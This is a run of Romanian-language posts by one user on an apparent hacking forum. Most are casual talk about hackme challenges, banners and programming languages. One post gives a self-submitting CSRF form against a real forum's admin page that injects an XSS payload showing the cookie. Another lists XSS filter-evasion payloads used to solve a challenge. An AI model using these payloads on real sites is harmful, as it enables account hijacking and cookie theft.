[Live.Com *BUG*]

sa observi faptul ca am zis RASFOIND prin VASTUL internet !

Si live.com nu e o pagina de Internet? E un castron de ciorba' date=' sau ce e, ca nu mai inteleg ... Nu e vine mea ca nu stii sa te exprimi.

deci cer un WARN pentru PROSTIE excesiva si limbaj neadecvat

Deh, asa sunt eu de felul meu mai prost. Dar explica-mi si mie partea cu limbajul neadecvat ca nu prea inteleg .

P.S.: Poti sa imi dai warn si fara sa mai accepti aprobarea celorlalti. Inteleg cand nu sunt binevenit undeva .

[Live.Com *BUG*]

ce descopar ?! un mare BUG de la microsoft live

Nu l-ai "descoperit" tu:

http://www.webarea.ro/archive/index.php/t-139.html

mai astept pareri sa se simta si ficatu meu bne

Chiar crezi ca meriti laude pentru o minciuna ?

[RST se prabuseste ..]

kwe, nu trebuie sa te multumesti doar cu asta. Hackpedia este axat mai mult pe programare/design, iar renslt ... prefer sa nu comentez .

Pacat ca se intampla asa cum ai zis si tu: oamenii isi fac prieteni pe forum si muta discutiile de aici pe Y!M. Totusi, mai exista si oameni care au continuat sa faca tutoriale (vladii, slick etc) in ciuda faptului ca sunt stresati de timp.

[ISATCIS Hackme]

am ajuns la lvl 15:)

Bravo !

Apropo, o sa ai nevoie si de ceva germana la nivelul urmator (asta daca nu gasesti un transalator de la care sa intelegi) !

[ISATCIS Hackme]

m-am blocat la nivelul 8. e o imagine care pare sa nu existe

Incearca din nou .. e foarte simplu . Uita-te la cum arata URL-ul la nivelele de dinainte si cum arata acum...exploreaza parent directory-ul acestui nivel

[ISATCIS Hackme]

Salut! In caz ca va plictisiti, ati putea incerca acest challenge. Este format din 16 nivele, si necesita mai mult cunostinte de programare si mai putin de securitate (penultimul nivel). Dificultatea este medie (zic eu, desigur, asta dupa ce treci de primele multe nivele simple).

PLAY

Cand il terminati, ar trebui sa va apara un ecran de genul :

P.S.: Daca il terminati (si vreti), lasa-ti-va semnatura in guestbook, si mentionati ca sunteti romani ... fiti mandrii de asta .

[RSTPOWER ;)]

Si la ce te-ai referit cand ai spus double post?

DoublePost se chema cand faci 2 posturi unul dupa altul.

Offtopic se cheama ce facem noi aici .

[Hello ... ma prezint si eu:P]

Welcome. Oricine vrea sa invete e binevenit aici .

[RSTPOWER ;)]

Si cum spuneam ... cand o sa faceti public grabberul?

Bafta in continuare

[RSTPOWER ;)]

se poate afla ziua, luna si raspunsu la intrebarea secreta tot din cookie? Se cunoaste metoda sau nu s-a descoperit inca.

Din cate stiu eu, nu. Daca vrei sa citestimai multe, arunca un ochi pe aici.

[Windows XP virtual]

Ce format e??? UTF sau ce?!

Apare asa pentru ca e scris cu diacritice( Ã , ã , Î , î, ª , º , Þ ) si probabil forumul de atunci avea suport pentru ele iar cel de acum nu mai are.

[RSTPOWER ;)]

Interesant . Apropo, cookie-urile o sa fie "la comun" ?

[alegere limbaj de programare]

ai folosit cumva asta cu autoit ?

Nu. Oricum, uite aici ceva ce ar putea sa te ajute.

Problema e ca scriptul are (inca) niste erori micute.

[OpenSource si Free Software nu este pentru toti]

Acelasi lucru l-am spus si eu aici. Ai totala dreptate ... oricum, multi habar nu au cum se instaleaza un Linux odata ce l-ai downloadat (si nici nu se chinuie sa caute ) , dovada faptul ca pe mai toate forumurile de IT sunt posturi pe aceasta tema.

Bafta, si sa speram ca lucrurile lo sa se schimbe (in bine) ...

[alegere limbaj de programare]

Incearca AutoIT. Toate uneltele sunt free, sintaxa e usoara, poate afisa imagini si gasesti suport din plin pe forumul lor.

[*.3xforum.ro CSRF]

Merci de info, nu stiam asta.

Pe viitor, o sa incerc sa aprofundez subiectul .

[*.3xforum.ro CSRF]

3xforum e grozav . Dupa XSS, trebuia sa vina,desigur, si CSRF.

Merge doar daca victima este logata pe un cont de admin/moderator, pentru ca apeleaza /admin_index.php , pagina vizibila doar adminilor si moderatorilor.

<form method="POST" action="http://*.3xforum.ro/admin_index.php" name="tw8">
	<tr>
		<td>Parola:</td>
		<td><input type=text name=parola value='"><script>alert(document.cookie)</script>'</td>
		<td><input type=submit value="GO"></td>
	</tr></form>
<script>
document.tw8.submit();
</script>

Bafta !

[[url]www.renslt.org[/url] (ex carcabot.ro) XSS]

Doamne, asta da securitate .

[noul banner]

nowledge]iar pe partea cealalta sa se faca o echipa speciala de "translatori" care sa traduca posturile.Vor fi traduse toate cap coada

Si cam cine crezi tu ca o sa aiba chef sa traduca atat ?

Time is $ ...

[Magic ISO Maker v5.4.251]

Nu ar fi mai simplu sa dai tu un edit la post si sa stergi linkul, decat sa astepti sa curete un mod/admin ?

Cat despre soft, il folosesc si eu si chiar mi se pare folositor si rapid.

[noul banner]

E frumos banner-ul , dar ma obisnuisem cu cel vechi. Ar fi dragut daca ati putea face astfel incat sa ne alegem fiecare unul din cele 2 bannere (ca un fel de theme).

[Lectie de viata]

Gata cu off...

Oare de ce presimt ca o sa iasa urat ... lemme think .

Ontopic: Sa te lasi de droguri e greu, dar nu imposibil. Tatal meu a fumat timp de 24 de ani, si totusi acum a reusit sa se lase (are vreo 6 luni de cand s-a lasat, cred), lucru din ce in ce mai des la oamenii din zilele astea, din fericire. Eu nu fumez si nu am pus/nu voi pune niciodata gura pe tigare (sau alt drog).

[Hack Me]

Cred ca toti cei care ati vrut sa il faceti, ati avut destul timp la dispozitie . Acum, o sa sterg challenge-ul, pentru ca un XSS poate face multe .

Metode prin care puteati rezolva challenge-ul, era sa introduceti in input:

• From SharinGod : <LINK REL=stylesheet HREF=http://ha.ckers.org/xss.css>
  From phreak: <script<script> alert(2) </script</script>
  From me: tw8<script<script>var i; i =/t/;i=i+/w8/;i=i.substring(1,2) + i.substring(4,6);alert(i);</script</script>

Restul au fost, probabil, variatiuni pe aceeasi tema.

Bafta !

[primul post ...]

Bine ai venit pe RST !

[very easy hack me (php)]

Dupa cateva minute de munca pe branci si chinuri ... amprenta vezi PM.

http://pandurii.evonet.ro/tw8.txt

Bafta !